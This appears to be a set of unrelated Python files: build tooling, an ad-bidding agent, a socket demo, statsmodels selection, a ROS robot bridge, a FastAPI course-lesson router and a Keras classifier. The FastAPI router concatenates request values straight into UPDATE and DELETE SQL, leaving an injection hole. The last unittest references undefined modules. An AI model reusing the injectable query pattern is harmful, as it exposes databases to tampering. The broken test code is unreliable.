group.add_argument("output", nargs="?", type=str, help="venv location")
# subparser that routes operation
sub = parser.add_subparsers(title="Operation", dest="op")
sub.add_parser("build", help="build virtualenv", parents=[install_parser])
sub.add_parser(
"sync",
help="sync virtualenv using pipenv, "
"will build venv first if it does not exist",
parents=[install_parser],
)
op_copy_parser = sub.add_parser("copy", help="copy virtualenv")
op_copy_parser.add_argument(
"source", nargs="?", type=str, help="venv source location"
)
op_copy_parser.add_argument(
"output", nargs="?", type=str, help="venv output location"
)
op_sync_setup_parser = sub.add_parser(
"sync_setup", help="sync setup.py from Pipfile"
)
op_sync_setup_parser.add_argument(
"setup_file",
nargs="?",
default=".",
type=str,
help="location of the setup.py file you want to sync",
)
op_sync_setup_parser.add_argument(
"--freeze",
action="store_true",
help="Do a frozen sync with pinned versions from Pipfile.lock",
)
op_sync_setup_parser.add_argument(
"--dry", action="store_true", help="Do a dry run"
)
def venv_exists(self, path=None):
"""
Does a valid virtual environment exist at location?
If no location is supplied the path in `self.output` is checked
**Keyword Arguments**
- path (`str`): path to check (should be virtuelenv root directory)
**Returns**
`True` if venv exists, `False` if not
"""
return os.path.exists(os.path.join(path or self.output, "bin", "activate"))
def venv_validate(self, path=None):
"""
Validate virtualenv at location
If no location is supplied the path in `self.output` is checked
Will raise a `UsageError` on validation failure
**Keyword Arguments**
- path (`str`): path to check (should be virtuelenv root directory)
"""
if not self.venv_exists(path):
raise UsageError(f"No virtualenv found at {path or self.output}")
def execute(self, **kwargs):
self.kwargs = kwargs
python_version = self.get_config("python_version")
pipfile = self.get_config("pipfile")
self.python_version = self.render_tmpl(python_version)
self.pipfile = self.render_tmpl(pipfile)
output = self.get_config("output") or ""
self.log.info(f"Pipfile: {self.pipfile}")
self.output = os.path.abspath(self.render_tmpl(output))
self.binpath = os.path.join(os.path.dirname(__file__), "..", "bin")
self.prepare()
self.shell = True
op = self.get_op(kwargs.get("op"))
op(**kwargs)
@expose("ctl.{plugin_name}.build")
def build(self, **kwargs):
"""
build a fresh virtualenv
"""
command = [f"ctl_venv_build {self.output} {self.python_version}"]
self._run_commands(command, **kwargs)
@expose("ctl.{plugin_name}.sync")
def sync(self, **kwargs):
"""
sync a virtualenv using pipenv
will build a fresh virtualenv if it doesnt exist yet
"""
if not self.venv_exists():
self.build(**kwargs)
command = [f"ctl_venv_sync {self.output} {self.pipfile}"]
self._run_commands(command, **kwargs)
@expose("ctl.{plugin_name}.copy")
def copy(self, source, **kwargs):
"""
copy virtualenv to new location
"""
source = os.path.abspath(self.render_tmpl(source))
self.venv_validate(source)
command = [f"ctl_venv_copy {source} {self.output}"]
self._run_commands(command, **kwargs)
@expose("ctl.{plugin_name}.sync_setup")
def sync_setup(self, setup_file=".", dry=False, freeze=False, dev=True, **kwargs):
"""
Syncs setup.py requirements from Pipfile
**Keyword Arguments**
- setup_file (`str`): path to `setup.py` file. If not specified
will check in `.` instead
- dry (`bool`=`False`): if `True` do a dry run and report what
updates would be done to `setup.py`
- freeze (`bool`=`False`): if `True` do frozen pinned versions
from Pipfile.lock
- dev (`bool`=`True`): Also fill extras_require with Pipfile dev
entries
"""
if not pipenv_setup:
raise UsageError(
"Please install `pipenv-setup` to be able to use this command"
)
if dry:
sub_command = "check"
else:
sub_command = "sync"
with self.cwd_ctx(os.path.dirname(setup_file) or "."):
command = f"pipenv-setup {sub_command} --dev"
if dev:
command = f"{command} --dev"
if not freeze:
command = f"{command} --pipfile"
self._run_commands([command], **kwargs)
|
from ete3 import Tree
x = Tree("((((G:9)E:5)C:7)B:7,(F:6)D:5)A;", format=1)
print(x.get_ascii(show_internal = True))
|
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 22 00:12:36 2017
@author: Eyal
"""
from CampaignClass import Campaign
from UcsManagerClass import ucsManager
import itertools
import math
def eprint(*args, **kwargs):
# print(*args, file=sys.stderr, **kwargs)
with open("../myLogs/sim{0}/PinePyEngine_Sim{0}.log".format(Agent.simId), "a+") as logFile:
print(*args, file=logFile, **kwargs)
# logFile.write(*args)
class Agent:
simId = 0
def __init__(self, name):
self.name = name
self.quality = 1.0 #starting quality is 1.0
''' powers of 0.9 '''
self.dailyUCSLevel = 0.9 #starting UCS Level is 0.9
''' list of CIDs'''
self.my_cids = []
def __repr__(self):
return "Agent {}: Q: {} Campaigns: {}".format(self.name, self.quality, self.my_campaigns())
def my_campaigns(self):
return [Campaign.campaigns[cid] for cid in self.my_cids]
def getOnGoingCampaigns(self, day):
return [camp for camp in self.my_campaigns() if camp.activeAtDay(day)]
def campaignOpportunityBid(self, campaign): # as defined in the document
COB = campaign.initial_budget_bid()
if (COB < campaign.reach*self.quality) and (COB > campaign.reach/(10*self.quality)): #inside interval
return COB
elif COB >= campaign.reach*self.quality: #greater than maximum
return (campaign.reach*self.quality) - 5
else: #lower than minimum
return campaign.reach/(10*self.quality) + 5
def formBidBundle(self, day):
'''
forms a bid bundle for tomorrow
param day is (current game day + 1)
'''
bidsArray = []
ongoing_camps = self.getOnGoingCampaigns(day)
eprint("#formBidBundle: {}: tomorrow is {}, ongoing camps tomorrow are {}".format(self.name, day, [cmp.cid for cmp in ongoing_camps]))
ucs_level = ucsManager.get_desired_UCS_level(day, ongoing_camps) #day is tomorrow as this function expects
if ucs_level > 0:
ucs_level -= 1
lvl_accuracy = ucsManager.level_accuracy(ucs_level)
for cmp in ongoing_camps:
cid = cmp.cid
eprint("#formBidBundle: forming bids for cid {}".format(cid))
cmpSegmentsSize = cmp.sizeOfSegments()
goal_targeted_number_of_imps_for_day = max(min(cmpSegmentsSize*lvl_accuracy, (cmp.impressions_goal - cmp.targetedImpressions)*lvl_accuracy) ,0)
if goal_targeted_number_of_imps_for_day < 1:
continue
eprint("#formBidBundle: cid:{} goal_targeted_number_of_imps_for_day is {}, impressionsGoal = {}, targetedImps = {}, level_accuracy = {}".format(
cid, goal_targeted_number_of_imps_for_day, cmp.impressions_goal, cmp.targetedImpressions, lvl_accuracy))
# sort segments of campaign based on segment demand
# cmpSegmentsList = sorted(cmp.segments, key = lambda x: x.segment_demand(day, Campaign.getCampaignList()))
cmp.segments.sort(key = lambda x: x.segment_demand(day, Campaign.getCampaignList()))
cmpSegmentsList = cmp.segments
eprint("#formBidBundle: sorted campaigns for cid={} are {}".format(cid, cmpSegmentsList))
bidSegments = []
for i in range(len(cmpSegmentsList)):
if sum(seg.size for seg in cmpSegmentsList[:i]) * lvl_accuracy > goal_targeted_number_of_imps_for_day:
bidSegments = cmpSegmentsList[:i]
break
if not bidSegments:
bidSegments = cmpSegmentsList
eprint("#formBidBundle: for cid={} the bid segments are {}".format(cid ,bidSegments))
def mean(numbers):
return float(sum(numbers)) / max(len(numbers), 1)
avgDem = mean([seg.segment_demand(day, Campaign.getCampaignList()) for seg in bidSegments])
eprint("#formBidBundle: demands for segments are: {}".format([seg.segment_demand(day, Campaign.getCampaignList()) for seg in bidSegments]))
if any(seg.segment_demand(day, Campaign.getCampaignList()) != avgDem for seg in bidSegments):
eprint("#formBidBundle: demand varies!")
NORMALING_FACTOR = 38.0 #TODO: think what that should be
PANIC_FACTOR = 1.0
# if cmp.startDay == 1:
# PANIC_FACTOR *= 1.5
if cmp.endDay == day-1:
PANIC_FACTOR = 1.15
elif cmp.endDay == day:
PANIC_FACTOR = 1.4
outputCoeff = 1
dailyImpsAvg = cmp.impressions_goal / cmp.activePeriodLength()
dailyImpsAvgTogo = max((cmp.impressions_goal - cmp.targetedImpressions),0) / (cmp.endDay - day + 1)
if dailyImpsAvgTogo > dailyImpsAvg:
outputCoeff = dailyImpsAvgTogo / dailyImpsAvg
p = cmp.avg_p_per_imp
eprint("#formBidBundle: for camp {} the p is {} and avgDem is {}".format(cmp.cid, p, avgDem))
for x in itertools.product(bidSegments + [None], ["Text","Video"], ["Desktop", "Mobile"]):
seg = x[0]
coeffsMult = 1
if x[1] == "Video" and cmp.videoCoeff > 1:
coeffsMult *= cmp.videoCoeff
if x[2] == "Mobile" and cmp.mobileCoeff > 1:
coeffsMult *= cmp.mobileCoeff
if seg == None: #empty query (UNKNOWN)
#bid = p * coeffsMult
bid = 0.005
#this stands for the impressions we don't expect to catch because of lack of ucs
s = max(min(cmpSegmentsSize, (cmp.impressions_goal - cmp.targetedImpressions)) - goal_targeted_number_of_imps_for_day,0)
query = {
"marketSegments" : [{"segmentName":"Unknown"}],
"Device" : x[2],
"adType" : x[1]
}
else: #normal query
demand = seg.segment_demand(day, Campaign.getCampaignList())
#eprint("#formBidBundle: for segment {}, (demand - avgDem) is {}".format(seg, demand - avgDem))
bid = float(max((p * (demand / avgDem) * NORMALING_FACTOR) * coeffsMult * PANIC_FACTOR * outputCoeff , 0))
# if bid < 0:
# eprint("formBidBundle: warning (demand - avgDem) turned the bid to negative. fixed it somehow")
# bid = p * PANIC_FACTOR * outputCoeff
if (not seg is bidSegments[-1]):
s = seg.size
else:
s = max(goal_targeted_number_of_imps_for_day - sum(segTag.size for segTag in bidSegments[:-1]), 0)
query = {
"marketSegments" : [{"segmentName":seg.name}],
"Device" : x[2],
"adType" : x[1]
}
bidsArray += [{"query" : query,
"bid" : str(bid),
"campaignId" : int(cid),
#"weight" :1 ,
"weight" : int(math.sqrt(cmp.imps_to_go()) if cmp.imps_to_go() > 0 else 0),
"dailyLimit" : str(float(bid*s*lvl_accuracy))}]
eprint("#formBidBundle: out of this func")
return bidsArray |
import os
import socket
import threading
import SocketServer
SERVER_HOST = '127.0.0.1'
SERVER_PORT = 0 #random port
BUF_SIZE = 1024
ECHO_MSG = 'Hello Server!'
class ThreadedServerRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(BUF_SIZE)
currentThread = threading.current_thread()
response = '%s: %s' % (currentThread.name, data)
#print response
self.request.send(response)
class ThreadedServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(message)
response = sock.recv(BUF_SIZE)
print 'Client received:', response
except Exception as e:
pass
finally:
sock.close()
if __name__ == '__main__':
server = ThreadedServer((SERVER_HOST, SERVER_PORT), ThreadedServerRequestHandler)
ip, port = server.server_address
serverThread = threading.Thread(target=server.serve_forever)
serverThread.setDaemon(True)
serverThread.start()
print 'Server thread name:', serverThread.name
client(ip, port, 'I\'m client1')
client(ip, port, 'I\'m client2')
client(ip, port, 'I\'m client3')
server.shutdown()
|
#import odd_cluster, frequent_values, duplicate_months
#import diurnal_cycle, distributional_gap, records, streaks
#import spike, climatological, humidity, clouds, variance
#import clean_up, winds
|
'''
Created on Jan 9, 2015
@author: niuzhaojie
'''
from Task import Task
class ComputeTask(Task):
'''
classdocs
'''
def __init__(self, taskID, priority, resource, execTime):
'''
Constructor
'''
super(ComputeTask, self).__init__(taskID, priority, resource)
self._execTime = execTime
self._workload = execTime
def getWorkload(self):
return self._workload
def schedule(self, t):
if self._workload < t:
self._workload = 0
else:
self._workload -= t
|
class Solution:
def containsDuplicate(self, nums: List[int]) -> bool:
"""
1) O(n2)
2) O(nlong)
3) O(n) -- bit mani O(1)
4) Hashmap -- freq count O(n)
"""
d = {}
for i in range(len(nums)):
if nums[i] not in d:
d[nums[i]] = 0
d[nums[i]] += 1
for k,v in d.items():
if v >= 2:
return True
return False |
class dotAreaPolygons_t(object):
# no doc
def ToStruct(self,PartIds):
""" ToStruct(self: dotAreaPolygons_t,PartIds: ArrayList) """
pass
aIdList=None
ClientID=None
nAreas=None
nIdList=None
|
import pandas as pd
import statsmodels.formula.api as sm
import statsmodels.api as sma
from pathlib import Path
file = open('forward_output2.txt','w')
def forward_selected(data, response, remaining, prev=[]):
"""
based upon algorithm found at: https://planspace.org/20150423-forward_selection_with_statsmodels/
"""
selected = []
prv = []
current_score, best_new_score = 0.05, 0.05
best_formula = ''
starting_formula = "{response} ~ {prev}{selected}"
for i in range(0,len(prev)):
prv.append("+".join(prev[i]))
if len(prv) > 0:
previous = "+".join(prv)
else:
previous = '1'
while remaining and current_score == best_new_score:
current_score = 0.05
scores_with_candidates = []
sel = starting_formula.format(response=response, selected='+'.join(selected), prev=previous)
s_file = "models/"+sel.replace(response+" ~ ","")+'.pickle'
s_file = s_file.replace('+', '')
if Path(s_file).exists():
sel_model = sma.load(s_file)
else:
if sel == best_formula:
sel_model = best_model
else:
sel_model = sm.ols(sel, data).fit()
sel_model.save(s_file)
print("testing base: {}".format(sel), file = file)
print("testing base: {}".format(sel))
if previous == "1" or previous == "":
previous = ""
else:
if previous[:1] != "+":
previous = previous+"+"
for candidate in remaining:
formula = starting_formula.format(response=response, selected='+'.join(selected + [candidate]), prev=previous)
f_file = "models/"+formula.replace(response+" ~ ","")+'.pickle'
f_file = f_file.replace('+','')
if Path(f_file).exists():
model = sma.load(f_file)
else:
model = sm.ols(formula, data).fit()
model.save(f_file)
print("testing addition: {}".format(formula), file = file)
print("testing addition: {}".format(formula))
prf = sma.stats.anova_lm(sel_model,model)['Pr(>F)'].loc[1]
print("testing addition: {} result: {}".format(formula, prf), file = file)
print("testing addition: {} result: {}".format(formula, prf))
scores_with_candidates.append((prf, candidate, model, formula))
scores_with_candidates.sort()
best_new_score, best_candidate, best_model, best_formula = scores_with_candidates.pop(0)
if best_new_score < current_score:
remaining.remove(best_candidate)
selected.append(best_candidate)
current_score = best_new_score
if previous[:1] != "+" and len(selected) == 0:
previous = previous[:-1]
formula = starting_formula.format(response=response, selected='+'.join(selected), prev=previous)
model = sm.ols(formula, data).fit()
model.save('best_model2.pickle')
return model, formula, selected
d = pd.read_csv("cleaned.csv")
d['ReleaseMonth'] = d['ReleaseMonth'].astype('str')
d['ReleaseYear'] = d['ReleaseYear'].astype('str')
result, f, selected = forward_selected(d,'ReservesLevel',['Channel','Platform','ReleaseYear','ReleaseMonth','RelativeWeek','GameType'])
print(f, file = file)
print(selected, file = file)
print(result.summary(), file = file)
print(f)
print(selected)
print(result.summary())
file.flush()
file.close()
|
#!/usr/bin/python
import yaml
from os import path
import rospy
import actionlib
import rosparam
# Actionlib messages
import lasr_pnp_bridge.msg as lpb_msg
from std_msgs.msg import String, Header
from sensor_msgs.msg import Image, PointCloud2
from actionlib_msgs.msg import GoalStatus
from geometry_msgs.msg import Point, Quaternion, Pose
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from play_motion_msgs.msg import PlayMotionAction, PlayMotionGoal
from lasr_img_depth_mask.msg import DepthMaskAction, DepthMaskGoal
from lasr_object_detection_yolo.msg import yolo_detectionAction, yolo_detectionGoal
from pal_interaction_msgs.msg import TtsGoal, TtsAction
from collections import defaultdict
import cv2
from cv_bridge import CvBridge, CvBridgeError
class P1Server(object):
_feedback = lpb_msg.BridgeFeedback()
_result = lpb_msg.BridgeResult()
def __init__(self, server_name):
# bridge server
self._bridge_server = actionlib.SimpleActionServer(server_name, lpb_msg.BridgeAction, execute_cb=self.execute_cb, auto_start=False)
self._bridge_server.start()
# Initialising clients: move_base, playmotion, objectRecognition and table_status
self.move_base_client = actionlib.SimpleActionClient('/move_base', MoveBaseAction)
self.play_motion_client = actionlib.SimpleActionClient('/play_motion', PlayMotionAction)
self.depth_mask_client = actionlib.SimpleActionClient('/depth_mask', DepthMaskAction)
self.object_recognition_client = actionlib.SimpleActionClient('/yolo_detection', yolo_detectionAction)
self.speech_client = actionlib.SimpleActionClient('/tts', TtsAction)
# Bool variable and wake_word subscriber for voice plan activation
self.running = False
rospy.Subscriber('/wake_word/wake_word_detected', String, self.handle_wake_word_detected)
self.plan_publisher = rospy.Publisher('/p1/planToExec', String, queue_size=1)
# Get the Tables Dictionary from the parameter server
self.tables = rospy.get_param("/tables")
def handle_wake_word_detected(self, data):
wake_word = data.data
if not self.running and wake_word == 'start the demo':
self.running = True
self.plan_publisher.publish('p1PlanNew')
def execute_cb(self, goal):
rospy.loginfo("----------ExternalServer start----------")
# log action and parameters
rospy.loginfo("action is: " + str(goal.action))
rospy.loginfo("params are: " + str(goal.params))
# reset result
self._result = lpb_msg.BridgeResult()
# call the action
getattr(self, goal.action)(*goal.params)
self._bridge_server.set_succeeded(self._result)
# end callback
rospy.loginfo("----------ExternalServer end----------")
def initialise(self):
# initialise PNP variables
pass
def gotoHome(self):
rospy.loginfo('Going to home')
home = rospy.get_param('/Home')
self.move_base_client.wait_for_server(rospy.Duration(15.0))
goal = MoveBaseGoal()
goal.target_pose.header = Header(frame_id="map", stamp=rospy.Time.now())
goal.target_pose.pose = Pose(position = Point(**home['loc']['position']),
orientation = Quaternion(**home['loc']['orientation']))
rospy.loginfo('Sending goal location ...')
self.move_base_client.send_goal(goal) #waits forever
if self.move_base_client.wait_for_result():
rospy.loginfo('Goal location achieved!')
else:
rospy.logwarn("Couldn't reach the goal!")
def goto(self):
table_index = rospy.get_param('/HAL9000/current_table')
pose_index = rospy.get_param('/HAL9000/current_pose')
print table_index
# TODO: move to individual action file
rospy.loginfo('Going to: %d with pose %d', table_index, pose_index)
self.move_base_client.wait_for_server(rospy.Duration(15.0))
# For now
if pose_index == 0:
pose = 'far_pose'
else:
pose = 'close_pose'
goal = MoveBaseGoal()
goal.target_pose.header = Header(frame_id="map", stamp=rospy.Time.now())
goal.target_pose.pose = Pose(position = Point(**self.tables['table' + str(table_index)]['loc'][pose_index][pose]['position']),
orientation = Quaternion(**self.tables['table' + str(table_index)]['loc'][pose_index][pose]['orientation']))
rospy.loginfo('Sending goal location ...')
self.move_base_client.send_goal(goal) #waits forever
if self.move_base_client.wait_for_result():
rospy.loginfo('Goal location achieved!')
else:
rospy.logwarn("Couldn't reach the goal!")
# If we moved close to the table means we have already taken the picture
if pose_index == 1:
self._result.condition_event = ['pictureDone']
rospy.set_param('/HAL9000/current_pose', 0)
def talk(self, speech_in):
print('\033[1;36mTIAGO: ' + speech_in + '\033[0m')
tts_goal = TtsGoal()
tts_goal.rawtext.lang_id = 'en_GB'
tts_goal.rawtext.text = speech_in
self.speech_client.send_goal(tts_goal)
# subscribes to topic until a recent depth cloud image (less than 2 seconds ago) is taken
def maskCallback(self, data):
print('Time now: ' + str(rospy.Time.now().secs) + '. Time of pcl: ' + str(data.header.stamp.secs))
if((rospy.Time.now().secs - data.header.stamp.secs) < 2):
self.depth_points = data
self.depth_sub.unregister()
def countPeople(self):
table_index = rospy.get_param('/HAL9000/current_table')
# TODO: move to individual action file
# Take a picture of the table from afar
# Wait for recognition action server to come up and send goal
# Step 1: Raise torso up to have a better view of people
# Wait for the play motion server to come up and send goal
# self.play_motion_client.wait_for_server(rospy.Duration(15.0))
# pose_goal = PlayMotionGoal()
# pose_goal.motion_name = "count_people"
# pose_goal.skip_planning = True
# self.play_motion_client.send_goal(pose_goal)
# rospy.loginfo('Count people goal sent')
# rospy.sleep(3)
# DEPTH MASK
# create depth cloud subscriber, wait for depth_points to be updated
self.depth_points = None
self.depth_sub = rospy.Subscriber('/xtion/depth_registered/points', PointCloud2, self.maskCallback)
while True:
if self.depth_points != None:
break
# create goal
mask_goal = DepthMaskGoal()
mask_goal.depth_points = self.depth_points
mask_goal.filter_left = 1
mask_goal.filter_right = 1
mask_goal.filter_front = 3.5
# send goal and wait for result
self.depth_mask_client.send_goal(mask_goal)
rospy.loginfo('Depth mask goal sent')
rospy.loginfo('Waiting for the depth mask result...')
self.depth_mask_client.wait_for_result()
mask_result = self.depth_mask_client.get_result()
# COCO DETECTION
#TODO VIEW RESULTS BECAUSE INVISIBLE PERSON APPEARED
self.object_recognition_client.wait_for_server(rospy.Duration(15.0))
# create goal
recognition_goal = yolo_detectionGoal()
recognition_goal.image_raw = mask_result.img_mask
recognition_goal.dataset = "coco"
recognition_goal.confidence = 0.3
recognition_goal.nms = 0.3
# send goal and wait for result
self.object_recognition_client.send_goal(recognition_goal)
rospy.loginfo('Recognition goal sent')
rospy.loginfo('Waiting for the detection result...')
self.object_recognition_client.wait_for_result()
count_objects_result = self.object_recognition_client.get_result()
# dictionary of results
object_count = defaultdict(int)
for detection in count_objects_result.detected_objects:
object_count[detection.name] += 1
person_count = object_count['person']
speech_out = 'I see ' + str(person_count) + ' person'
if not person_count == 1:
speech_out += 's'
# view the image - debug
# bridge = CvBridge()
# frame = bridge.imgmsg_to_cv2(count_objects_result.image_bb, "bgr8")
# cv2.imshow('image_masked', frame)
# cv2.waitKey(0)
# Step 1: Back to default
# Wait for the play motion server to come up and send goal
# self.play_motion_client.wait_for_server(rospy.Duration(15.0))
# pose_goal = PlayMotionGoal()
# pose_goal.motion_name = "back_to_default"
# pose_goal.skip_planning = True
# self.play_motion_client.send_goal(pose_goal)
# rospy.loginfo('Back to default goal sent')
# rospy.sleep(3)
# output result
self.talk(speech_out)
# Update the number of people in the parameter server
rospy.loginfo('Updating the number of people found at table %d' % table_index)
rospy.set_param('/tables/table' + str(table_index) + '/person_count', person_count)
rospy.loginfo('Updated the person counter successfully')
# Switch to the pose closer to the table
rospy.loginfo('Switching to the second pose')
rospy.set_param('/HAL9000/current_pose', 1)
# Sleeps are required to avoid Tiago's busy status from body motions controllers
def identifyStatus(self):
# TODO: move to individual action file
table_index = rospy.get_param('/HAL9000/current_table')
rospy.loginfo('Identifying the status of: %d' % table_index)
# Step 1: Look down to see the table
# Wait for the play motion server to come up and send goal
self.play_motion_client.wait_for_server(rospy.Duration(15.0))
pose_goal = PlayMotionGoal()
pose_goal.motion_name = "check_table"
pose_goal.skip_planning = True
self.play_motion_client.send_goal(pose_goal)
rospy.loginfo('Looking down goal sent')
rospy.sleep(3)
# Step 2: Take a picture of the table surface
# Wait for recognition action server to come up and send goal
# COSTA DETECTION
self.object_recognition_client.wait_for_server(rospy.Duration(15.0))
# create goal
recognition_goal = yolo_detectionGoal()
recognition_goal.image_raw = rospy.wait_for_message('/xtion/rgb/image_raw', Image)
recognition_goal.dataset = "costa"
recognition_goal.confidence = 0.3
recognition_goal.nms = 0.3
# send goal and wait for result
self.object_recognition_client.send_goal(recognition_goal)
rospy.loginfo('Recognition goal sent')
rospy.loginfo('Waiting for the detection result...')
self.object_recognition_client.wait_for_result()
count_objects_result = self.object_recognition_client.get_result()
# dictionary of results
object_count = defaultdict(int)
for detection in count_objects_result.detected_objects:
object_count[detection.name] += 1
if len(object_count):
speech_out = 'I see '
for costa_object in object_count:
speech_out += ', ' + str(object_count[costa_object]) + ' ' + str(costa_object)
if not object_count[costa_object] == 1:
speech_out += 's'
self.talk(speech_out)
else:
self.talk('no objects found')
# Step 4: Get head and torso back to default
pose_goal.motion_name = "back_to_default"
self.play_motion_client.send_goal(pose_goal)
rospy.loginfo('Default head position goal sent')
rospy.sleep(3)
# Step 4: Decide on table status and send tts goal to the sound server
foundPerson = rospy.get_param('/tables/table' + str(table_index) + '/person_count')
foundConsumable = len(object_count)
if foundPerson:
if foundConsumable:
result = 'Already served'
else:
result = 'Needs serving'
else:
if foundConsumable:
result = 'Dirty'
else:
result = 'Clean'
# Update the status of the table in the parameter server
rospy.loginfo('Updating the table status of table %d', table_index)
rospy.set_param('/tables/table' + str(table_index) + '/status', result)
rospy.loginfo('Updated the table status successfully')
# output result
self.talk('Status of table {0} is {1}'.format(table_index, result))
rospy.sleep(1)
def count(self):
# TODO: move to individual action file
rospy.loginfo('Counting all the tables')
# if any table status is unknown, set it to the robot's current table
self.tables = rospy.get_param("/tables")
print(self.tables)
unknown_exist = False
for table in self.tables:
print(table)
if (self.tables[table])['status'] == 'unknown':
if not unknown_exist:
unknown_exist = True
next_table = self.tables[table]['id']
elif self.tables[table]['id'] < next_table:
next_table = self.tables[table]['id']
if unknown_exist:
rospy.set_param('/HAL9000/current_table', next_table)
print "\033[1;33m" + "The next table is " + str(next_table) + "\033[0m"
else:
# if all tables have been identified, counting is done
self._result.condition_event = ['doneCounting']
|
from typing import Dict, List
from fastapi import Depends,File, UploadFile, APIRouter, HTTPException
from sqlalchemy.orm import Session
from app.authentication import models
#from courses_live.database import SessionCourse, some_engine
from app.talent.database import SessionLocal, engine,database
import shutil
import datetime
#from coursebysubject.models import subjects
# Pagination
from fastapi_pagination import Page, pagination_params
from fastapi_pagination.paginator import paginate
router = APIRouter()
import uuid
from pathlib import Path
import time
#from fastapi.staticfiles import StaticFiles
from starlette.staticfiles import StaticFiles
import os
from os.path import dirname, abspath, join
import cloudinary
import cloudinary.uploader
from . import crud
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
models.Base.metadata.create_all(bind=engine)
import boto3
from fastapi.param_functions import File, Body
from s3_events.s3_utils import S3_SERVICE_VIDEO
from app.configs import bucketinfo
def bucket_config():
return bucketinfo.setting()
AWS_ACCESS_KEY_ID = bucket_config().AWS_ACCESS_KEY_ID#os.getenv("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = bucket_config().AWS_SECRET_ACCESS_KEY#os.getenv("AWS_SECRET_ACCESS_KEY")
AWS_REGION = bucket_config().AWS_REGION #os.getenv("AWS_REGION")
S3_Bucket = bucket_config().S3_Bucket #os.getenv("S3_Bucket")
S3_Key = "lesson" # change everywhere
PUBLIC_DESTINATION = "https://cinedarbaar.s3.ap-south-1.amazonaws.com/"
s3_client = S3_SERVICE_VIDEO(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_REGION)
@router.post("/course/lesson")
async def create_lesson(
course_id:int,title:str,name:str,description:str,chapter:int,fileobject: UploadFile= File(...), filename: str = Body(default=None), db: Session = Depends(get_db)
):
if filename is None:
#filename = generate_png_string()
extension_pro = fileobject.filename.split(".")[-1] in ("mp4", "3gp", "mkv")
if not extension_pro:
return "video must be jpg or png format!"
suffix_pro = Path(fileobject.filename).suffix
filename = time.strftime( str(uuid.uuid4().hex) + "%Y%m%d-%H%M%S" + suffix_pro )
data = fileobject.file._file # Converting tempfile.SpooledTemporaryFile to io.BytesIO
uploads3 = await s3_client.upload_fileobj(bucket=S3_Bucket, key=S3_Key+"/"+filename, fileobject=data)
if uploads3:
url = os.path.join(PUBLIC_DESTINATION, S3_Key+"/"+filename)
return crud.create_lesson(db=db,name=name,title=title,description=description,url=url,course_id=course_id,chapter=chapter)
else:
raise HTTPException(status_code=400, detail="Failed to upload in S3")
@router.put("/course/lesson/{id}")
async def update_lesson(
id:int,course_id:int,title:str,name:str,description:str,chapter:int,fileobject: UploadFile= File(...), filename: str = Body(default=None), db: Session = Depends(get_db)
):
if filename is None:
#filename = generate_png_string()
extension_pro = fileobject.filename.split(".")[-1] in ("mp4", "3gp", "mkv")
if not extension_pro:
return "video must be jpg or png format!"
suffix_pro = Path(fileobject.filename).suffix
filename = time.strftime( str(uuid.uuid4().hex) + "%Y%m%d-%H%M%S" + suffix_pro )
data = fileobject.file._file # Converting tempfile.SpooledTemporaryFile to io.BytesIO
uploads3 = await s3_client.upload_fileobj(bucket=S3_Bucket, key=S3_Key+"/"+filename, fileobject=data )
if uploads3:
url = os.path.join(PUBLIC_DESTINATION, S3_Key+"/"+filename)
subject = crud.get_lesson(db,id)
if not subject:
raise HTTPException(status_code=404, detail="Lesson not found")
query = "UPDATE lessons SET title='"+str(title)+"' , name='"+str(name)+"', description ='"+str(description)+"', COURSE_ID = '"+str(course_id)+"' , chapter='"+str(chapter)+"', url='"+str(url)+"' WHERE id='"+str(id)+"'"
db.execute(query)
db.commit()
return {"Result" : "Module Updated Succesfully"}
else:
raise HTTPException(status_code=400, detail="Failed to upload in S3")
@router.get("/courses/lesson/" ,dependencies=[Depends(pagination_params)])
def lesson_list(db: Session = Depends(get_db)):
course_all = crud.lesson_list(db=db)
return paginate(course_all)
@router.get("/courses/lesson/{id}")
def course_detail(id:int,db: Session = Depends(get_db)):
course_by_id = crud.get_lesson(db=db, id=id)
if course_by_id is None:
raise HTTPException(status_code=404,detail="Course by this id is not in database")
return { "Lesson":course_by_id}
@router.get("/courses/lesson/{course_id}/{chapter}")
def course_detail_weekly(course_id:int,chapter:int,db: Session = Depends(get_db)):
course_week = crud.course_list_weekly(db, course_id, chapter)
if not course_week:
raise HTTPException(status_code=404,detail="Course by this id is not in database")
return { "Lesson":course_week}
@router.delete("/courses/lesson/{id}")
async def delete(id: int, db: Session = Depends(get_db)):
subject = crud.get_lesson(db,id)
if not subject:
raise HTTPException(status_code=404,detail="Course by this id is not in database")
query = "Delete From lessons WHERE id='"+str(id)+"'"
db.execute(query)
db.commit()
return "deleted Succesfully"
|
import math
def min(area,base):
return math.ceil((2*area)/base)
m,n=input().split()
area = int(m)
base = int(n)
height = min(area,base)
print("Minimum height is %d" % (height))
|
from keras.layers import Dense, Input, GlobalMaxPooling1D
from keras.layers import Conv1D, MaxPooling1D
from keras.models import Model
def CNN(embedding_layer):
#构建、连接其他层
label_num = {"spam":1, "ham":0}
MAX_SEQUENCE_LENGTH = 50
sequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32') # 占位。
embedded_sequences = embedding_layer(sequence_input) # 返回 句子个数*50*100
x = Conv1D(128, 5, activation='relu')(embedded_sequences)
x = MaxPooling1D(2)(x)
x = Conv1D(128, 5, activation='relu')(x)
x = MaxPooling1D(2)(x)
x = Conv1D(128, 5, activation='relu')(x)
x = MaxPooling1D(2)(x)
x = GlobalMaxPooling1D()(x)
x = Dense(128, activation='relu')(x)
preds = Dense(len(label_num), activation='softmax')(x)
model = Model(sequence_input, preds)
model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
model.summary()
return model |
'''
Created on 20/04/2013
@author: cristian
'''
import os
import unittest
from app import db
from app.modelo import User2
#basedir = os.path.abspath(os.path.dirname(__file__))
class UsuarioTestCase(unittest.TestCase):
def setUp(self):
self.db_fd, microblog.app.config['DATABASE'] = tempfile.mkstemp()
self.app = microblog.app.test_client()
microblog.init_db()
def tearDown(self):
os.close(self.db_fd)
os.unlink(flaskr.DATABASE)
